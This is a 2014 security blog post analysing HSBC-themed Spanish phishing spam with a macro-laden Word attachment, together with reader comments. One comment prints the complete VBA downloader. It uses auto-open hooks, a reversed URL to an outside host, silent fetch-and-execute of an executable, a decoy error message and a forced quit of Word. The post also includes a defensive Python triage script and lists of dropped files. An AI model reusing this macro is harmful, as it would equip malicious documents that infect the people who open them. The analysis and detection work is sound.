Thursday, 17 July 2014

"Notificación de transferencia de fondos a su favor" spam

This Spanish-language spam has a malicious Word document as an attachment.

From:     HSBC Transferencias [Mexico_contacto@hsbc.com.mx]
Reply-To:     respuesta@hsbc.com.mx
Date:     17 July 2014 11:01

WELCOME TO HSBC!

The purpose of this email is to inform you that today you received a SPEI transfer which has been held due to anomalies in your account. For more details about this situation we attach a document in Microsoft Word format in which we explain the reason for the hold and the steps to follow.

Issuing bank: BBVA BANCOMER
Amount: $94,000.00
Date: 17/07/2014
Folio: 89413

Status: Held
We recommend following the steps described in the document attached to this email.

For any questions or clarification we are at your service at contacto@hsbc.com.mx or, if you prefer, you can contact Online Banking at the following telephone numbers:
     México D.F. (55) 5721 1635
     From any state of the Republic at 01800 4722 638, toll-free.

We will be happy to assist you

The attachment is essentially the same as the one mentioned here, which tries to lure the victim into disabling their Word macro security settings so that a malicious macro can run.

The VirusTotal detection rate is a pretty poor 4/54. You can see some of the text strings in the Malwr report, including a reversed URL, exe.ss/pw/arc/lc.paip//:ptth, which the macro reverses back to http://piap.cl/cra/wp/ss.exe and then tries to download a file from (currently 404ing). The VBA in the document can be found here [pastebin].

As mentioned before, this is a long-running campaign apparently targeting users in Mexico, and as yet I have not seen this in any language except Spanish.

8 comments:

Cosas extrañamente normales said...

Thank you so much, I received this same email yesterday, had no idea what to do until I saw the properties and saw "modified by 'clein'", so I started looking for that name and found your blog. My sister opened the document and activated the macros yesterday, I don't know what to do, the PC isn't behaving suspiciously at all. What should I do? Greetings from México

edit: When my sister opened the document it said it isn't compatible with my PC. Also, she said it didn't download anything after opening.

Ulises Pérez said...

Hi, how do I know I'm not infected with some virus? I also opened it by accident.

Cesar Alejandro Amezcua Tejeda said...

This is the code that runs, be careful. It's VBA and, as the post says, it downloads files to your computer.

' Auto-execute entry points: the host application (Word or Excel) runs whichever
' of these it recognises, so the download starts as soon as macros are enabled.
Private Sub Auto_Open()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "4b646n46.exe")
End Sub
Private Sub Workbook_Open()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "rsd54tgs.exe")
End Sub
Private Sub AutoExec()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "ds8fydsa89f7.exe")
End Sub
Private Sub AutoOpen()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "fsfsfsdsd.exe")
End Sub
Private Sub Document_Open()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "hjhhjhjhjhj.exe")
End Sub
' Fetches URL into %TMP%\SaveName and executes it. The URL literal is stored
' reversed (StrReverse) to defeat simple string scans; it decodes to
' http://piap.cl/cra/wp/ss.exe, the address mentioned in the post.
Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
On Error Resume Next   ' swallow every error, e.g. the download failing with a 404
Err.Clear

Set XML = CreateObject("Microsoft.XMLHTTP")   ' HTTP client
Set ADS = CreateObject("ADODB.Stream")        ' binary stream used to write the file

XML.Open "GET", URL, False
XML.send

XML.getAllResponseHeaders

FullSavePath = Environ(SavePath) & "\" & SaveName   ' Environ("TMP") -> the user's Temp folder

ADS.Open
ADS.Type = 1   ' adTypeBinary
ADS.Write XML.responseBody
ADS.SaveToFile FullSavePath, 2   ' adSaveCreateOverWrite

Shell FullSavePath, vbNormalFocus   ' run the downloaded executable
DownloadFile = True
' Decoy error dialog ("This document is not compatible with this computer") so the
' victim believes the file simply failed to open.
MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error"
' After two iterations the loop suppresses save prompts and quits the application,
' closing the document before the user can inspect it.
Dim z
z = 0
Do While 1 = 1
If z = 2 Then
Application.DisplayAlerts = False
Application.Quit
End If
z = z + 1
Loop
End Function
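
For triaging a macro dump like the one quoted above (and the reversed URL noted in the post), here is an added Python example that is not from the blog or the commenter: it decodes StrReverse("...") literals back to readable URLs, lists the auto-execute entry points, the download/file-write objects and the Shell call, and gives a simple verdict. The VBA fragment embedded in it is constructed from the quoted code; the detection lists are assumptions covering only what this sample uses.

```python
import re

# Constructed sample: a fragment modelled on the macro quoted in the comment above.
SAMPLE_VBA = '''Private Sub AutoOpen()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "fsfsfsdsd.exe")
End Sub
Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String)
Set XML = CreateObject("Microsoft.XMLHTTP")
Set ADS = CreateObject("ADODB.Stream")
ADS.SaveToFile FullSavePath, 2
Shell FullSavePath, vbNormalFocus
End Function
'''

# Entry points Office runs automatically, and the COM objects this sample uses
# to fetch and write a file (assumed lists, limited to what the page shows).
AUTOEXEC_SUBS = {"Auto_Open", "AutoOpen", "AutoExec", "Workbook_Open", "Document_Open"}
DOWNLOAD_OBJECTS = {"Microsoft.XMLHTTP", "ADODB.Stream"}

STRREVERSE_RE = re.compile(r'StrReverse\("([^"]*)"\)', re.IGNORECASE)
SUB_RE = re.compile(r'^\s*(?:Private|Public)?\s*Sub\s+(\w+)\s*\(', re.IGNORECASE | re.MULTILINE)
CREATEOBJECT_RE = re.compile(r'CreateObject\("([^"]+)"\)', re.IGNORECASE)
SHELL_RE = re.compile(r'^\s*Shell\s', re.IGNORECASE | re.MULTILINE)


def decode_reversed_strings(vba: str) -> list[str]:
    """Undo StrReverse("...") literals so the indicators can be read and blocked."""
    return [s[::-1] for s in STRREVERSE_RE.findall(vba)]


def triage(vba: str) -> dict:
    """Collect auto-exec subs, download objects, decoded URLs and Shell use from a macro dump."""
    subs = set(SUB_RE.findall(vba))
    objects = set(CREATEOBJECT_RE.findall(vba))
    decoded = decode_reversed_strings(vba)
    findings = {
        "autoexec_subs": sorted(s for s in subs if s in AUTOEXEC_SUBS),
        "download_objects": sorted(o for o in objects if o in DOWNLOAD_OBJECTS),
        "decoded_urls": [u for u in decoded if u.lower().startswith(("http://", "https://"))],
        "calls_shell": bool(SHELL_RE.search(vba)),
    }
    # Auto-exec + download object + decoded URL + Shell is the complete downloader pattern.
    hits = sum(1 for v in findings.values() if v)
    findings["verdict"] = "suspicious" if hits >= 3 else "review"
    return findings


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Feed it the text that a macro extractor (for example oletools' olevba) produces, not the .doc file itself.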

Cesar Alejandro Amezcua Tejeda said...

From what I understand, it is probably downloaded to the Temp folder; in my case that is

C:\Users\[usuario]\AppData\Local\Temp

So look in that folder for the files

4b646n46.exe
rsd54tgs.exe
ds8fydsa89f7.exe
fsfsfsdsd.exe
hjhhjhjhjhj.exe

and if they are there, delete them and run a scan on the computer.

Conrad Longmore said...

@Cosas extrañamente normales: I think opening it is harmless unless you have disabled the Macro security.

Cosas extrañamente normales said...

@Conrad Longmore It looks like the macro security was disabled. Just noticed my PC opens IE on startup. I did what Cesar Alejandro Amezcua Tejeda said.

btw

Thanks @Cesar Alejandro Amezcua Tejeda, if I find anything else in the scan I'll write it here.